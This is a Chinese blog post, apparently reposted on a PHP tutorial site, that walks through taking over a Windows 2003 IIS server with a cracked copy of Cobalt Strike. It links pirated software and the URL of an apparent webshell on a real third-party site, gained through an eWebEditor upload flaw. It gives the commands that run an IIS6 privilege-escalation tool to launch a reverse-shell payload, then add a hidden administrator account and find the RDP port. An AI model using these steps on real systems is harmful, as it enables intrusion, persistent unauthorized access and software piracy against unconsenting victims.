来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 作者:阿布 团队:www anying org 暗影技术团队 转载须注明团队,否则追究 *Armitage是一个图形化的metasploit网络攻击管理工具,它可视化你的攻击目标,推荐exploit和公开了metasploit框架的高...
|
作者:阿布 团队:www.anying.org 暗影技术团队 转载须注明团队,否则追究
/*Armitage是一个图形化的metasploit网络攻击管理工具,它可视化你的攻击目标, 推荐exploit和公开了metasploit框架的高级功能。 Armitage是一款Java写的Metasploit图形界面的攻击软件, 可以用它结合Metasploit已知的exploit来针对存在的漏洞自动化攻击。 bt5、kali linx 下集成免费版本Armitage,Cobalt Strike是它的商业版本, 乃们懂得,图形界面非常友好,一键傻瓜化使用MSF高级功能,自动攻击测试。 但是不对我大天朝出口,免费使21天,剩下的你们懂的,不喜欢图形界面的筒子请无视。 友情提示:win版本请自测有XXOO无捆绑。 */ 下载地址如下:http://www.2cto.com/soft/201304/38406.html (破解版) http://xxoo.com.cn/ewebeditor/UploadFile/2013717212415335.asa win2k3+支持aspx 相信明眼人一看就知道是ewebeditor编辑器拿的shell 我就不多说方法了 .. 首先上传 cmd.exe iis6.exe 到Z:\RECYCLER\ 也就是回收站 因为支持aspx 所以可以直接执行命令 算了 上个图吧 无图无真相不是  因为iis6是支持 后缀是txt 等各式的 都可以执行命令 稍微等一下 权限很大 接下来我们等一下 打开cobaltstrike 有如下选项  我们选择左下角的ADD增加一个Listeners(监听)  设置如左图 然后点击Save这样就算增加了一个监听的payload端口是5656 在然后选择attacks选项  选择如左图选择了Generate以后 保存的位置 跟名字  随便起一个名字  接下来最后一步执行..(草 图好多) cmd路径 Z:\RECYCLER\cmd.exe 语句: /c Z:\RECYCLER\iis6.xtx "Z:\RECYCLER\eset.exe" 不一会就会反弹回来  因为权限比较大,反弹回来就是system的权限,,我们直接选择cmdshell net user admin 123 /add net localgroup administrators admin /add 添加上管理员即可,终端号可以在注册表查询 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
